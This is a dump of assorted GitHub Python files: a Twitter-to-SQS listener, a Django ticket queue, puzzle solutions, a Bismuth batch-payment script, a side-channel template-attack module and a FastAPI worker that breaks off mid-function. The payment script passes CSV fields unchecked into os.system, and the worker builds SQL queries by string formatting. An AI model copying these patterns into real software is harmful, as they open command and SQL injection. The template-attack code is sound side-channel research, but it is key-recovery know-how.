1\n","repo_name":"Dorian-RND/Big-Data","sub_path":"TF_IDF/Nouvelle_Version/df_idfV2.py","file_name":"df_idfV2.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35196628359","text":"import frappe\n\nfrom non_profit.setup import setup_non_profit\n\n\ndef get_company():\n\tcompany = frappe.defaults.get_defaults().company\n\tif company:\n\t\treturn company\n\telse:\n\t\tcompany = frappe.get_list(\"Company\", limit=1)\n\t\tif company:\n\t\t\treturn company[0].name\n\treturn None\n\n\ndef before_tests():\n\t# complete setup if missing\n\tfrom frappe.desk.page.setup_wizard.setup_wizard import setup_complete\n\tif not frappe.get_list(\"Company\"):\n\t\tsetup_complete({\n\t\t\t\"currency\" :\"USD\",\n\t\t\t\"full_name\" :\"Test User\",\n\t\t\t\"company_name\" :\"Frappe Care LLC\",\n\t\t\t\"timezone\" :\"America/New_York\",\n\t\t\t\"company_abbr\" :\"WP\",\n\t\t\t\"industry\" :\"Healthcare\",\n\t\t\t\"country\" :\"United States\",\n\t\t\t\"fy_start_date\" :\"2021-01-01\",\n\t\t\t\"fy_end_date\" :\"2021-12-31\",\n\t\t\t\"language\" :\"english\",\n\t\t\t\"company_tagline\" :\"Testing\",\n\t\t\t\"email\" :\"test@erpnext.com\",\n\t\t\t\"password\" :\"test\",\n\t\t\t\"chart_of_accounts\" : \"Standard\",\n\t\t\t\"domains\" : [\"Non Profit\"],\n\t\t})\n\t\tsetup_non_profit()\n","repo_name":"frappe/non_profit","sub_path":"non_profit/non_profit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"13729801452","text":"from tweepy.streaming import StreamListener\nimport json\nimport boto3\nfrom . import configure\nmaxTweets = 100\n\nclass tweetListener(StreamListener):\n\n print('here')\n\n def __init__(self):\n self.sqs= boto3.client('sqs', region_name='us-east-1',aws_access_key_id= configure.aws_access_key_id,aws_secret_access_key= configure.aws_secret_access_key)\n self.index=0\n\n def on_data(self, __rawData):\n print('here0')\n if __rawData:\n __count = 0\n jsonData = json.loads(__rawData)\n if jsonData.get(\"user\") is not None and jsonData.get(\"user\").get(\"name\"):\n name = jsonData.get(\"user\").get(\"name\")\n __count = __count + 1\n print('here1')\n if jsonData.get(\"coordinates\"):\n geo = jsonData.get(\"coordinates\").get(\"coordinates\")\n long = geo[0]\n lan = geo[1]\n __count = __count + 1\n print('here2')\n elif jsonData.get(\"place\"):\n geo = jsonData.get(\"place\").get(\"bounding_box\").get(\"coordinates\")[0]\n long = geo[0][0]\n lan = geo[0][1]\n __count = __count + 1\n print('here3')\n if jsonData.get(\"text\"):\n content = jsonData.get(\"text\")\n __count = __count + 1\n\n if jsonData.get(\"timestamp_ms\"):\n time = jsonData.get(\"timestamp_ms\")\n __count = __count + 1\n print('here4')\n\n if __count == 4 and jsonData.get('lang')=='en' :\n print('here5')\n self.index = self.index % maxTweets + 1\n attributes = {\"username\":{\"StringValue\":name,\"DataType\":\"String\"},\n \"lan\":{\"StringValue\":str(lan),\"DataType\":\"String\"},\n \"lon\":{\"StringValue\":str(lan),\"DataType\":\"String\"},\n \"timestamp\":{\"StringValue\":time,\"DataType\":\"String\"}\n }\n\n self.sqs.send_message(QueueUrl=configure.sqs_arn, MessageBody=content, MessageAttributes=attributes)\n print('here7')\n\n {\"created_at\": \"Thu Apr 20 19:41:13 +0000 2017\", \"id\": 855144341534371841, \"id_str\": \"855144341534371841\",\n \"text\": \"\\ud83d\\ude04 
https:\\/\\/t.co\\/rIuwfNs4IY\", \"display_text_range\": [0, 1],\n \"source\": \"\\u003ca href=\\\"http:\\/\\/twitter.com\\/download\\/iphone\\\" rel=\\\"nofollow\\\"\\u003eTwitter for iPhone\\u003c\\/a\\u003e\",\n \"truncated\": false, \"in_reply_to_status_id\": null, \"in_reply_to_status_id_str\": null,\n \"in_reply_to_user_id\": null, \"in_reply_to_user_id_str\": null, \"in_reply_to_screen_name\": null,\n \"user\": {\"id\": 2360637557, \"id_str\": \"2360637557\", \"name\": \"mila\", \"screen_name\": \"maykiiix\",\n \"location\": \"adapazar\\u0131 \", \"url\": null, \"description\": \"\\u03dc\\u03d3\\u017f\\u03de\",\n \"protected\": false, \"verified\": false, \"followers_count\": 310, \"friends_count\": 120,\n \"listed_count\": 0, \"favourites_count\": 4324, \"statuses_count\": 220,\n \"created_at\": \"Sun Feb 23 11:28:02 +0000 2014\", \"utc_offset\": 10800, \"time_zone\": \"Kyiv\",\n \"geo_enabled\": true, \"lang\": \"tr\", \"contributors_enabled\": false, \"is_translator\": false,\n \"profile_background_color\": \"C0DEED\",\n \"profile_background_image_url\": \"http:\\/\\/pbs.twimg.com\\/profile_background_images\\/444119123593670656\\/5UcT95_v.jpeg\",\n \"profile_background_image_url_https\": \"https:\\/\\/pbs.twimg.com\\/profile_background_images\\/444119123593670656\\/5UcT95_v.jpeg\",\n \"profile_background_tile\": true, \"profile_link_color\": \"0084B4\",\n \"profile_sidebar_border_color\": \"FFFFFF\", \"profile_sidebar_fill_color\": \"DDEEF6\",\n \"profile_text_color\": \"333333\", \"profile_use_background_image\": true,\n \"profile_image_url\": \"http:\\/\\/pbs.twimg.com\\/profile_images\\/854332509823406081\\/cCclbnUP_normal.jpg\",\n \"profile_image_url_https\": \"https:\\/\\/pbs.twimg.com\\/profile_images\\/854332509823406081\\/cCclbnUP_normal.jpg\",\n \"profile_banner_url\": \"https:\\/\\/pbs.twimg.com\\/profile_banners\\/2360637557\\/1491606706\",\n \"default_profile\": false, \"default_profile_image\": false, \"following\": null,\n \"follow_request_sent\": null, \"notifications\": null}, \"geo\": null, \"coordinates\": null,\n \"place\": {\"id\": \"0b5219d6ce6a63ee\",\n \"url\": \"https:\\/\\/api.twitter.com\\/1.1\\/geo\\/id\\/0b5219d6ce6a63ee.json\", \"place_type\": \"admin\",\n \"name\": \"Adapazar\\u0131\", \"full_name\": \"Adapazar\\u0131, Sakarya\", \"country_code\": \"TR\",\n \"country\": \"T\\u00fcrkiye\", \"bounding_box\": {\"type\": \"Polygon\", \"coordinates\": [\n [[30.228445, 40.734714], [30.228445, 40.963103], [30.594337, 40.963103], [30.594337, 40.734714]]]},\n \"attributes\": {}}, \"contributors\": null, \"is_quote_status\": false, \"retweet_count\": 0,\n \"favorite_count\": 0, \"entities\": {\"hashtags\": [], \"urls\": [], \"user_mentions\": [], \"symbols\": [],\n \"media\": [{\"id\": 855144330088124417, \"id_str\": \"855144330088124417\",\n \"indices\": [2, 25],\n \"media_url\": \"http:\\/\\/pbs.twimg.com\\/media\\/C94VPMqXkAEB774.jpg\",\n \"media_url_https\": \"https:\\/\\/pbs.twimg.com\\/media\\/C94VPMqXkAEB774.jpg\",\n \"url\": \"https:\\/\\/t.co\\/rIuwfNs4IY\",\n \"display_url\": \"pic.twitter.com\\/rIuwfNs4IY\",\n \"expanded_url\": \"https:\\/\\/twitter.com\\/maykiiix\\/status\\/855144341534371841\\/photo\\/1\",\n \"type\": \"photo\",\n \"sizes\": {\"medium\": {\"w\": 480, \"h\": 797, \"resize\": \"fit\"},\n \"large\": {\"w\": 480, \"h\": 797, \"resize\": \"fit\"},\n \"thumb\": {\"w\": 150, \"h\": 150, \"resize\": \"crop\"},\n \"small\": {\"w\": 410, \"h\": 680, \"resize\": \"fit\"}}}]},\n \"extended_entities\": {\"media\": [\n {\"id\": 
855144330088124417, \"id_str\": \"855144330088124417\", \"indices\": [2, 25],\n \"media_url\": \"http:\\/\\/pbs.twimg.com\\/media\\/C94VPMqXkAEB774.jpg\",\n \"media_url_https\": \"https:\\/\\/pbs.twimg.com\\/media\\/C94VPMqXkAEB774.jpg\",\n \"url\": \"https:\\/\\/t.co\\/rIuwfNs4IY\", \"display_url\": \"pic.twitter.com\\/rIuwfNs4IY\",\n \"expanded_url\": \"https:\\/\\/twitter.com\\/maykiiix\\/status\\/855144341534371841\\/photo\\/1\",\n \"type\": \"photo\", \"sizes\": {\"medium\": {\"w\": 480, \"h\": 797, \"resize\": \"fit\"},\n \"thumb\": {\"w\": 150, \"h\": 150, \"resize\": \"crop\"},\n \"small\": {\"w\": 410, \"h\": 680, \"resize\": \"fit\"}}}]}, \"favorited\": false,\n \"retweeted\": false, \"possibly_sensitive\": false, \"filter_level\": \"low\", \"lang\": \"und\",\n \"timestamp_ms\": \"1492717273492\"}","repo_name":"zijiezhu/TwitterTrend","sub_path":"TwitterTrend/Backend/tweetListener.py","file_name":"tweetListener.py","file_ext":"py","file_size_in_byte":7639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1387659114","text":"import sys\nMAX = 100000\ninput = sys.stdin.readline\n\nfor tb in range(int(input())):\n n = int(input())\n candidates = []\n\n for i in range(n):\n [a, b] = map(int, input().split())\n candidates.append((a, b))\n\n candidates.sort()\n\n paper_min = candidates[0][0]\n interview_min = candidates[0][1]\n count = 1\n\n for paper, interview in candidates[1:]:\n if interview > interview_min:\n continue\n else:\n interview_min = min(interview, interview_min)\n count += 1\n\n print(count)\n","repo_name":"Dltmd202/BOJ-ProblemSlove","sub_path":"python/1946/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3303555193","text":"import random\n\n# https://leetcode.com/problems/insert-delete-getrandom-o1/\n\nclass RandomizedSet:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.store = set()\n self.all_store = []\n def insert(self, val: int) -> bool:\n \"\"\"\n Inserts a value to the set. Returns true if the set did not already contain the specified element.\n \"\"\"\n if val not in self.store:\n self.store.add(val)\n self.all_store.append(val)\n return True\n return False\n\n def remove(self, val: int) -> bool:\n \"\"\"\n Removes a value from the set. 
Returns true if the set contained the specified element.\n \"\"\"\n if val in self.store:\n self.store.remove(val)\n return True\n return False\n\n def getRandom(self) -> int:\n \"\"\"\n Get a random element from the set.\n \"\"\"\n while True:\n if len(self.all_store) == 1:\n chosen = 0\n else:\n chosen = random.randint(0, len(self.all_store) - 1)\n if self.all_store[chosen] in self.store:\n return self.all_store[chosen]\n self.all_store.pop(chosen)\n \n\n\n# Your RandomizedSet object will be instantiated and called as such:\n# obj = RandomizedSet()\n# param_1 = obj.insert(val)\n# param_2 = obj.remove(val)\n# param_3 = obj.getRandom()\n","repo_name":"Infinidrix/competitive-programming","sub_path":"Day 24/RandomizedSet.py","file_name":"RandomizedSet.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40342404685","text":"from django.views import View\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import render\nfrom collections import deque\n\nline_of_cars = {'change_oil': deque(),\n 'inflate_tires': deque(),\n 'diagnostic': deque()}\n\nid_ticket = 0\nnumber_of_ticket = None\n\n\nclass WelcomeView(View):\n def get(self):\n return HttpResponse('
Welcome to the Hypercar Service!
')\n\n\nclass MenuView(View):\n menu = {'change_oil': 'Change oil',\n 'inflate_tires': 'Inflate tires',\n 'diagnostic': 'Get diagnostic test'}\n template_name = 'tickets/menu.html'\n\n def get(self, request):\n return render(request, self.template_name, context={'menu': self.menu})\n\n\nclass GetTicket(View):\n template_name = 'tickets/get_ticket.html'\n ticket_type = None\n\n def get(self, request, ticket_type):\n self.ticket_type = ticket_type\n context = self.getting_number()\n return render(request, self.template_name, context=context)\n\n def getting_number(self):\n global id_ticket\n if self.ticket_type in line_of_cars.keys():\n minutes = self.count_waiting_time()\n id_ticket += 1\n line_of_cars[self.ticket_type].append(id_ticket)\n return {'id_ticket': str(id_ticket),\n 'minutes': str(minutes)}\n\n def count_waiting_time(self):\n change_oil = len(line_of_cars['change_oil']) * 2\n inflate_tires = change_oil + len(line_of_cars['inflate_tires']) * 5\n diagnostic = inflate_tires + len(line_of_cars['diagnostic']) * 30\n if self.ticket_type == 'change_oil':\n return change_oil\n if self.ticket_type == 'inflate_tires':\n return inflate_tires\n if self.ticket_type == 'diagnostic':\n return diagnostic\n\n\nclass Processing(View):\n template_name = 'tickets/processing.html'\n\n def get(self, request):\n context = {'change_oil': len(line_of_cars['change_oil']),\n 'inflate_tires': len(line_of_cars['inflate_tires']),\n 'diagnostic': len(line_of_cars['diagnostic'])}\n return render(request, self.template_name, context=context)\n\n def post(self, request):\n next_ticket = None\n global number_of_ticket\n if len(line_of_cars['change_oil']) > 0:\n next_ticket = 'change_oil'\n elif len(line_of_cars['inflate_tires']) > 0:\n next_ticket = 'inflate_tires'\n elif len(line_of_cars['diagnostic']) > 0:\n next_ticket = 'diagnostic'\n if next_ticket is not None:\n number_of_ticket = line_of_cars[next_ticket].popleft()\n else:\n number_of_ticket = None\n return self.get(request)\n\n\nclass Next(View):\n template_name = 'tickets/next.html'\n\n def get(self, request):\n context = {'number_of_ticket': number_of_ticket}\n return render(request, self.template_name, context=context)\n","repo_name":"skripnn/Hypercar_Service_Center","sub_path":"tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71748629587","text":"import random\nfrom matplotlib import pyplot\nimport numpy as np\n\n\ndef recursive_probably(p_matrix, previous_probably, count_t):\n if count_t == 0:\n return previous_probably\n current_probably = recursive_probably(p_matrix, previous_probably, count_t - 1).dot(p_matrix)\n return current_probably\n\n\ndef get_p_t_recursive(p_matrix, start_state, count_t):\n result = np.zeros(count_t)\n states = np.zeros(2)\n states[start_state] = 1\n for i in range(count_t):\n result[i] = recursive_probably(p_matrix, states, i)[start_state]\n return result\n\n\ndef get_p_t_th(p_matrix, start_state, count_t):\n result = np.zeros(count_t)\n states = np.zeros(2)\n states[start_state] = 1\n for i in range(count_t):\n pow_matrix = np.linalg.matrix_power(p_matrix, i)\n result[i] = states.dot(pow_matrix[start_state])\n return result\n\n\ndef get_p_t(p_matrix, start_state, count_n, count_t):\n result = np.zeros(count_t)\n for n in range(count_n):\n state = start_state\n for i in range(count_t):\n if state == start_state:\n result[i] += 1\n next_state_prob = random.random()\n if 
next_state_prob < p_matrix[state][start_state]:\n state = start_state\n else:\n state = (start_state + 1) % 2\n for i in range(T):\n result[i] /= N\n return result\n\n\nif __name__ == '__main__':\n P = np.array([[0.8, 0.2],\n [0.6, 0.4]])\n my_start_state = 1\n N = 100000\n T = 20\n\n p_t = get_p_t(P, my_start_state, N, T)\n p_t_th = get_p_t_th(P, my_start_state, T)\n p_t_rec = get_p_t_recursive(P, my_start_state, T)\n\n pyplot.plot(range(T), p_t)\n pyplot.plot(range(T), p_t_th)\n pyplot.savefig(\"result.png\")\n\n pyplot.clf()\n\n pyplot.plot(range(T), p_t)\n pyplot.plot(range(T), p_t_rec, \"r\")\n pyplot.savefig(\"result_rec.png\")\n","repo_name":"avdvnk/dopuski","sub_path":"task1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42161966412","text":"import numpy as np\nfrom sutils import trange\nfrom sfileengine import FileEngine\nfrom processors import ID_wise_mean\nfrom processors import ID_wise_mean_balanced\n# ======================================================================================\n#\n# ======================================================================================\ndef covariance_templates(clustered_traces:np.ndarray, n_classes:int, projection:np.ndarray):\n\t\"\"\"Build the mean and variance templates based on reduce train samples\n\n\t:param train_data: Sorted grouped array of traces, it normally comes from the output of a \n\t\tsorting functions which sorts and groups the traces by an specific criterion e.g. label\n\t\tor Sbox output value.\n\t:type train_data: np.ndarray\n\n\t:param n_classes:\n\t:type n_classes: int\n\n\t:param projection:\n\t:type projection:\n\t\"\"\"\n\t__mean = np.empty(0)\n\t__smat = np.empty(0)\n\t__n_poi = projection.shape(1)\n\tfor i in trange(n_classes, desc='[INFO *CovarianceTemplates*]: Computing covariance and mean matrixes'):\n\t\t__full_projected_train = np.empty(0)\n\n\t\t# It uses the feature space (projection) and projects to it each of the grouped traces.\n\t\t# i.e. 
projected_train is the projected traces of the i-th class\n\t\t# By doing this projection, the point of interest are gathered or re-arranged somehow\n\t\t# that might help the algorithm in choosing them smartly; from the projection\n\t\t# a n_poi of points is selected to build a mean matrix out of them.\n\t\t__projected_train = np.dot(clustered_traces[i], projection)\n\t\t__full_projected_train = np.append(__full_projected_train, __projected_train)\n\t\t__full_projected_train = np.reshape(__full_projected_train, (clustered_traces[i].shape[0], __n_poi))\n\t\t\n\t\t# Appends the mean of the projected train of the specific trace group\n\t\t# Here, the mean matrix is created, notice that this is the mean matrix\n\t\t# at each point of interest\n\t\t__mean = np.append(__mean, np.mean(__full_projected_train, axis=0))\n\t\t\n\t\t# After creating the mean matrix, we proceed to create the covariance matrix.\n\t\t# Similarly, to the mean matrix of each PoI, the covariance matrix is a matrix\n\t\t# formed as M_(n_poixn_poi)\n\t\t__smat = np.append(__smat, np.cov(np.transpose(__full_projected_train)))\n\t\n\t__cov_matrix = np.reshape(__smat, (n_classes, __n_poi, __n_poi))\n\t__mean_matrix = np.reshape(__mean, (n_classes, __n_poi))\n\n\treturn __mean_matrix, __cov_matrix\n# ======================================================================================\n#\n# ======================================================================================\ndef cov_mean_matrix(fileEngine:FileEngine, n_classes:int=256):\n\t\"\"\"Build the mean and variance templates based on reduce train samples\n\n\t:param train_data: Sorted grouped array of traces, it normally comes from the output of a \n\t\tsorting functions which sorts and groups the traces by an specific criterion e.g. 
label\n\t\tor Sbox output value.\n\t:type train_data: `np.ndarray`\n\n\t:param n_classes:\n\t:type n_classes: int\n\t\"\"\"\n\t__mean = np.empty((256, fileEngine.TotalSamples))\n\t__cov_matrix = np.empty((256, fileEngine.TotalSamples, fileEngine.TotalSamples))\n\t\n\t_, op_mean, _, clustered_traces = ID_wise_mean(fileEngine, clustered_traces=True)\n\t__mean[:] = op_mean[:]\n\tfor i_class in trange(n_classes, desc='[INFO *CovarianceTemplates*]: Computing covariance and mean matrices', position=0):\n\t\tfor i in trange(fileEngine.TotalSamples, desc='Row of {}'.format(i_class), position=1, leave=False):\n\t\t\tfor j in trange(fileEngine.TotalSamples, desc='col of {} and {}'.format(i_class, i), position=2, leave=False):\n\t\t\t\t# Set the next trace\n\t\t\t\ttrace_meta = np.array(fileEngine[clustered_traces[i_class]], dtype=np.ndarray)\n\t\t\t\t# Get the trace from the smaller file engine\n\t\t\t\ttraces = np.vstack(trace_meta[:,0])\n\t\t\t\tx = traces[:, i]\n\t\t\t\ty = traces[:, j]\n\t\t\t\t__cov_matrix[i_class, i, j] = np.cov(x, y)[0][1]\n\t\n\treturn __mean, __cov_matrix\n# ======================================================================================\n#\n# ======================================================================================\ndef _compute_covmean_matrix(n_classes, function_callback, **kwargs):\n\tfileEngine = kwargs['dataset']\n\n\t__mean = np.empty((256, fileEngine.TotalSamples))\n\tsmat = np.empty(0)\n\n\t_, op_mean, _, clustered_traces = function_callback(**kwargs)\n\n\t__mean[:] = op_mean[:]\n\t\n\tfor i_class in trange(n_classes, desc='[INFO *CovMeanTemplates*]: Computing covariance and mean matrices', position=0):\n\t\t# Set the next trace\n\t\ttrace_meta = np.array(fileEngine[clustered_traces[i_class]], dtype=np.ndarray)\n\t\t# Get the trace from the smaller file engine\n\t\ttraces = np.vstack(trace_meta[:,0])\n\t\tsmat = np.append(smat, np.cov(np.transpose(traces)))\n\n\t__cov_matrix = np.reshape(smat, (n_classes, fileEngine.TotalSamples, fileEngine.TotalSamples))\n\t\n\treturn __mean, __cov_matrix\n# ======================================================================================\n#\n# ======================================================================================\ndef covmean_matrix(\n\t\tfileEngine:FileEngine, n_classes:int=256, n_traces:int=None, \n\t\tplaintext_pos:int=None, key_pos:int=None, by_label:bool=True):\n\t\"\"\"Build the mean and variance templates based a TraceSet. The model is based on ID leakage model.\n\n\t:param fileEngine: A fileEngine that maps the TraceSet, normally, it represents the train set in a template attack\n\t:type fileEngine: :class:`FileEngine`\n\n\t:param n_classes:\n\t:type n_classes: int\n\t\"\"\"\n\t\n\tm_kwargs = {'dataset':fileEngine, \n\t\t'plaintext_pos':plaintext_pos, \n\t\t'key_pos':key_pos, \n\t\t'n_traces':n_traces, \n\t\t'by_label':by_label, \n\t\t'clustered_traces':True}\n\n\treturn _compute_covmean_matrix(n_classes, ID_wise_mean, **m_kwargs)\n\n# ======================================================================================\n#\n# ======================================================================================\ndef covmean_matrix_balanced(\n\t\tfileEngine:FileEngine, n_classes:int=256, n_indexes:int=None, \n\t\tbalancer_file=None, plaintext_pos:int=None, key_pos:int=None, \n\t\tby_label:bool=True):\n\t\"\"\"Build the mean and variance templates based a TraceSet. 
The model is based on ID leakage model.\n\n\t:param fileEngine: A fileEngine that maps the TraceSet, normally, it represents the train set in a template attack\n\t:type fileEngine: :class:`FileEngine`\n\n\t:param n_classes:\n\t:type n_classes: int\n\t\"\"\"\n\tm_kwargs = {'dataset':fileEngine,\n\t\t'balancer_file':balancer_file, \n\t\t'n_indexes':n_indexes,\n\t\t'plaintext_pos':plaintext_pos, \n\t\t'key_pos':key_pos, \n\t\t'n_indexes':n_indexes, \n\t\t'by_label':by_label, \n\t\t'clustered_traces':True}\n\t\t\t\t\n\treturn _compute_covmean_matrix(n_classes, ID_wise_mean_balanced, **m_kwargs)\n# ======================================================================================\n#\n# ======================================================================================\ndef template_predict(\n\t\ttest_fileengine:FileEngine, mean_matrix:np.ndarray, \n\t\tcov_matrix:np.ndarray, n_classes:int=256):\n\t\"\"\"\n\t:param test_fileengine:\n\t:type test_fileengine: :class:`FileEngine`\n\n\t:param mean_matrix:\n\t:type mean_matrix: `np.ndarray`\n\n\t:param cov_matrix:\n\t:type cov_matrix: `np.ndarray`\n\t\n\t:param n_classes:\n\t:type n_classes: `int`\n\t\"\"\"\n\tsmat_pool = np.sum(cov_matrix, axis=0)/n_classes\n\tinv_smat_pool = np.linalg.inv(smat_pool)\n\n\tres = np.zeros(shape=(test_fileengine.shape[0], n_classes))\n\tfor i in trange(test_fileengine.shape[0], desc='[INFO]: Computing template predictions', position=0):\n\t\tfor k in range(n_classes):\n\t\t\tT_k = np.array(test_fileengine[i][0], dtype=float) - mean_matrix[k]\n\t\t\tres[i,k] = -0.5* (np.dot(np.dot(T_k , inv_smat_pool), np.transpose(T_k)))\n\t\n\tres = np.reshape(res,(test_fileengine.shape[0], n_classes))\n\tpredict = np.empty((test_fileengine.shape[0], n_classes))\n\tprint (res)\n\tfor k in range(test_fileengine.shape[0]):\n\t\tpredict[k] = np.flip(np.argsort(res[k]))\n\treturn predict\n# ======================================================================================\n#\n# ======================================================================================\nclass CovMeanMatrix:\n\t@staticmethod\n\tdef from_fileengine():\n\t\tpass","repo_name":"chaserfw/chaserfw_packages","sub_path":"math/templates/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":8123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28602644810","text":"import time\n\n\"\"\"\nCall send_nogui.py (edit not to require manual confirmation)\nfor each address to pay.\n\nrewards.csv is to be in the same dir.\nformat is one payout per line, comma separated, address,amount,extra\n\n```25125e9bb305fafd51ceb2858d355f77da99550b933ec0923cd156ff,1310.4750655411829,5111\n8f2d03c817c3d36a864c99a27f6b6179eb1898a631bc007a7e0ffa39,603.0595488461871,2352\n0fc9b60126b8b5be3ab990eea6f184b02c1c0c5352709d023256ca58,459.7303448474547,1793```\n\nAmount really sent will be reduced by the tx fee, 0.01\n\nNO SAFETY there, be sure what you do.\n\nThe node has to be running with mempool on disk, not on ram or send_nogui does not work!!!\n\"\"\"\n\n\n\nimport argparse\nimport os\n\n__version__ = \"0.0.1\"\n\n\nSEND_PATH = \"send_nogui_noconf.py\" # path to modified send_no_gui.py in the Bismuth Dir.\n# That node has to be running with mempool on disk, not on ram!!!\n\nPYTHON_EXECUTABLE = \"python3\"\n\nparser = argparse.ArgumentParser(description='Bismuth Batch reward sender')\n# parser.add_argument(\"-v\", \"--verbose\", action=\"count\", default=False, help='Be 
verbose.')\nparser.add_argument(\"-y\", \"--yes\", action=\"count\", default=False, help='Do send')\nargs = parser.parse_args()\n\ntotal = 0\nnb = 0\nfor line in open('rewards.csv' , 'r'):\n data = line.strip().split(',')\n print (data)\n if len(data) > 1:\n try:\n total += float(data[1])\n data[1] = float(data[1]) - 0.01\n command = \"{} {} {} {} tx \".format(PYTHON_EXECUTABLE, SEND_PATH, data[1], data[0])\n if args.yes:\n print(\"Running: {}\".format(command))\n os.system(command)\n else:\n print(\"Check: {}, didn't you forget the magic word?\".format(command))\n nb += 1\n time.sleep(1)\n except Exception as e:\n print (e)\n\nprint(\"{} Transactions, {} $BIS total.\".format(nb, total))\n","repo_name":"hclivess/Bismuth","sub_path":"send_csv.py","file_name":"send_csv.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":187,"dataset":"github-code","pt":"48"} +{"seq_id":"11591660397","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 18 09:59:34 2023\n\n@author: wfschrec\n\"\"\"\n\nimport fastapi\nimport logging\nimport requests\nimport time\nimport configparser\nimport dbmanager\nimport os\nimport shutil\nimport subprocess\nimport re\nfrom fastapi import FastAPI, BackgroundTasks\nimport psycopg2\nfrom concurrent.futures.thread import ThreadPoolExecutor\n\napp = FastAPI()\napp = fastapi.FastAPI()\n\nconfig = configparser.ConfigParser()\nconfig.read('worker.ini')\n\nconnected = False\n\n\ndef db_register():\n\n logging.debug(\"Registering worker in database.\")\n dbmgr = dbmanager.DbManager()\n\n try:\n workip = config.get('worker', 'ip_addr')\n workport = config.get('worker', 'port')\n\n create_command = \"\"\"\n CREATE TABLE IF NOT EXISTS ptolemy_workers (ip_addr TEXT PRIMARY KEY, port TEXT, active BOOLEAN);\n \"\"\"\n dbmgr.execute_command(create_command)\n dbmgr.db_bulk_commit()\n\n check_command = \"\"\"\n SELECT COUNT(1) FROM ptolemy_workers WHERE ip_addr = '%s' AND port = '%s';\n \"\"\"\n result = dbmgr.exe_fetch_one(\n check_command % (workip, workport))\n\n if(result[0] > 0):\n activate_command = \"\"\"\n UPDATE ptolemy_workers SET active = 't' WHERE ip_addr = '%s' AND port = '%s';\n \"\"\"\n dbmgr.execute_command(activate_command %\n (workip, workport))\n dbmgr.db_bulk_commit()\n dbmgr.close_db_conn()\n else:\n add_command = \"\"\"\n INSERT INTO ptolemy_workers (ip_addr, port, active) VALUES (\\'%s\\', \\'%s\\', 't');\n \"\"\"\n dbmgr.execute_command(add_command % (workip, workport))\n dbmgr.db_bulk_commit()\n\n dbmgr.close_db_conn()\n\n except(Exception) as error:\n dbmgr.close_db_conn()\n raise HTTPException(status_code=500, detail=str(error))\n\n\n# Run the application\nif __name__ == '__main__':\n db_register()\n import uvicorn\n uvicorn.run(\"worker:app\", host=config.get('worker', 'ip_addr'), port=int(config.get(\n 'worker', 'port')), workers=int(config.get('worker', 'threads')), log_level=\"warning\")\n\n#\n# Basic reply to heartbeat request from orchestrator to ensure our endpoint\n# is still functional.\n#\n\n\n@app.get(\"/v0/heartbeat/\")\ndef return_heartbeat():\n workip = config.get('worker', 'ip_addr')\n workport = config.get('worker', 'port')\n logging.debug(\"Worker %s with port %s is alive and well.\" %\n (workip, workport))\n\n#\n# Function used to split a file into sized chunks\n#\n\n\ndef split_file(file_id, piece_size, staging_dir):\n\n with open(file_id, 'rb') as infile:\n index = 0\n while True:\n chunk = infile.read(piece_size)\n if not chunk:\n break\n chunk_path = file_id 
+ \".ptolemy\" + str(index)\n target = os.path.join(staging_dir, chunk_path[1:])\n temp_stor = os.path.split(target)\n logging.debug(\"Making directory: %s\" % temp_stor[0])\n os.makedirs(temp_stor[0], exist_ok=True)\n with open(target, 'wb') as outfile:\n outfile.write(chunk)\n outfile.close()\n index += 1\n infile.close()\n\n#\n#\n#\n\n\ndef process_car(cariter, project):\n\n # Command to get the list of car files we are building\n list_command = \"\"\"\n SELECT file_id, size FROM %s WHERE carfile = \\'%s\\' ;\n \"\"\"\n project_command = \"\"\"\n SELECT staging_dir, shard_size FROM ptolemy_projects WHERE project = \\'%s\\';\n \"\"\"\n\n global config\n car_util = config.get('worker', 'car_gen')\n stream_util = config.get('worker', 'commp')\n\n dbconf = configparser.ConfigParser()\n dbconf.read('database.ini')\n host = dbconf.get('database', 'host')\n dbname = dbconf.get('database', 'db_name')\n user = dbconf.get('database', 'db_user')\n passwd = dbconf.get('database', 'pass')\n\n conn = psycopg2.connect(host=host, database=dbname,\n user=user, password=passwd)\n cursor = conn.cursor()\n\n cursor.execute(project_command % project)\n project_meta = cursor.fetchone()\n\n cursor.execute(list_command % (project, cariter))\n file_list = cursor.fetchall()\n\n os.makedirs(os.path.join(project_meta[0], cariter), exist_ok=True)\n logging.info(\"Running car build for artifact: %s\" % cariter)\n\n piece_size = 1024 * 1024 * 1024 * project_meta[1]\n\n # Iterate through each file and place it in the car staging area,\n # if a file shard is requested we must split the file as well.\n for file_iter in file_list:\n try:\n if('.ptolemy' in file_iter[0]):\n # We check to see if the shard exists in staging then move it, otherwise\n # we shard the main file and then move the shard we are targeting.\n temp = os.path.join(project_meta[0], file_iter[0][1:])\n if(os.path.isfile(temp)):\n logging.debug(\n \"Found shard %s and placing in car directory.\" % file_iter[0])\n root = os.path.split(file_iter[0])\n car_stage = os.path.join(project_meta[0], cariter)\n landing_spot = os.path.join(car_stage, root[0][1:])\n os.makedirs(landing_spot, exist_ok=True)\n shutil.move(temp, landing_spot)\n logging.debug(\"Placed file %s in car staging area %s.\" % 